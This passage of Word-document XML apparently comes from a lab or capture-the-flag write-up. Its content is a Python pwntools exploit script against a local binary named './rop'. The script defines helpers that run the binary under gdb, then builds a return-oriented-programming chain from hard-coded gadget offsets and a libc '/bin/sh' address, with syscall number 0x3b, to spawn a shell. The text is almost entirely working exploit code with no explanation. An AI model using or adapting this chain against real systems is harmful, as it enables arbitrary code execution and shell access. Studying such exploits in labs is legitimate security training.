              <w:t>p.interactive()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="689252F2" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5084FB75" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>def test():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18AFA6C6" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p = process('/bin/bash')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="259DC9A8" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.sendline('gdb ./rop -q')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="314DEFB3" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.sendline("set disable-randomization off")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15F16C50" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.sendline("break *0x0040064a") # Break at ret in main</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69D4FB12" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.recv()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AB0E2B8" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.clean(timeout=0.05)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EF66603" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.sendline("r")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DB471A2" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>pwnLocal(p)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E7826F2" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.interactive()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="627AFC9C" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2339DFB0" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>def localPwn():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E4735CE" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p = process('./rop')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CE81BFF" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#p.sendline('gdb ./rop -q')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F86B85D" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#p.sendline("set disable-randomization off")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E5BA080" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#p.sendline("break *0x0040064a") # Break at ret in main</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C292ABD" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#p.recv()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22595F24" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#p.clean(timeout=0.05)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59A3B0AF" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#p.sendline("r")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77BE03C9" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>pwnLocal(p)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FA42A88" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.interactive()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68008EA0" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="786C8D8D" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>def pwnPLD_libc2(libcBase):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="777F5CF8" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>binary = context.binary = ELF('./rop', checksec=False)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C1E94F2" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C44F5AE" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># Gadgets in Binary</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C921876" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># 0x00000000004006b3 : pop rdi ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BC13145" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>popRDI = p64(0x004006b3)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D8C0C11" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># 0x00000000004006b1 : pop rsi ; pop r15 ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40B7C683" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>popRSI = p64(0x004006b1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65475D5D" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># 0x00000000004004a9 : ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DD5A773" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>retGdgt = p64(0x004004a9)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0885F1D9" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="159BCA1B" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="14A53119" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># Gadgets in Library</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="205943E8" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># 0x0000000000119431 : pop rdx ; pop r12 ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B8EDB1F" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>g = libcBase + 0x00119431</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="527904CF" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>log.info("popRDX - " + hex(g))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07BA5D28" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>popRDX = p64(g)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="139486D9" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:tab/>
              <w:t># 0x0000000000036174 : pop rax ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4405F8F7" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>g = libcBase + 0x0036174</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="342CF62C" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>log.info("popRAX - " + hex(g))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BECB2AD" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>popRAX = p64(g)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="028F75A3" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># 0x000000000002284d : syscall</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54A09913" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>g = libcBase + 0x002284d</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="301D43D9" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>log.info("syscall - " + hex(g))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DC0B36C" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>syscall = p64(g)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14B01D0A" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4356C433" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># Data for the stack</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72B1C1E0" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># /bin/sh address</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2867970D" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>binSh = libcBase + 0x001b45bd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="291A9E1F" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>datRDI = p64(binSh)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D30E147" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>datRSI = p64(0x00)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="573F4EB6" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>junk = p64(0xdeadbeef)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32BB87F1" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>datRDX = p64(0x00)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F5AEAA3" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>datRAX = p64(0x3b)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DE850FF" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="1478220D" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#pltPuts = p64(binary.plt.puts)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># Address to call</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FBF1746" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
